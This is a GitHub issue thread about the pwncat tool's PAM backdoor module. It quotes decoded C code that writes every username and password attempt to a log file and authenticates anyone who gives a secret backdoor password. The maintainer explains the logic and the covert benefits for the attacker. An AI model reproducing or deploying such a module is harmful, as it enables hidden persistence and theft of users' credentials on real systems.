### ISSUE TITLE
possible error in pam-backdoor (base64)

### ISSUE THREAD

**Issue by Simmens** [calebstewart/pwncat#35]
Disclaimer: I didn't try to run the code, but I did some reading about PAM and the error (if it's one) seems to be about coding logic.

If you decode the base64 in your pam.py, the following sticks out (sorry if the syntax highlight-ing doesn't work):

```c
	if( memcmp(SHA1(password, strlen(password), NULL), key, 20) != 0 ){
		filp = fopen("__PWNCAT_LOG__", "a");
		if( filp != NULL )
		{
			fprintf(filp, "%s:%s\n", username, password);
			fclose(filp);
		}
		return PAM_IGNORE;
	}
    //return success
    return PAM_SUCCESS;
```

If I understand this part correctly, the function returns PAM_IGNORE after a successful write operation, but thus never reaches the PAM_SUCCESS return code which, if I understand that correctly, is needed to successfully authenticate a user with a successful password. As it is, I understand that the following PAM Modules are evaluated after that which may result in a wrong authentication with the backdoor-pw.

**Comment by calebstewart** [comment]
You are partially correct. Yes, PAM_IGNORE causes this module to be ignored for authentication and the rest of the modules specified in the config to to tested. However, the code block you mentioned runs only if the password *is not* the backdoor password. In other words, if this is not our secret backdoor password, log the password and pass it on to the other modules. This has two benefits:

1. Normal authentication continues functioning normally.
2. We log all password attempts (including correct ones).

**Comment by Simmens** [comment]
Thank you for the very thorough explanation!
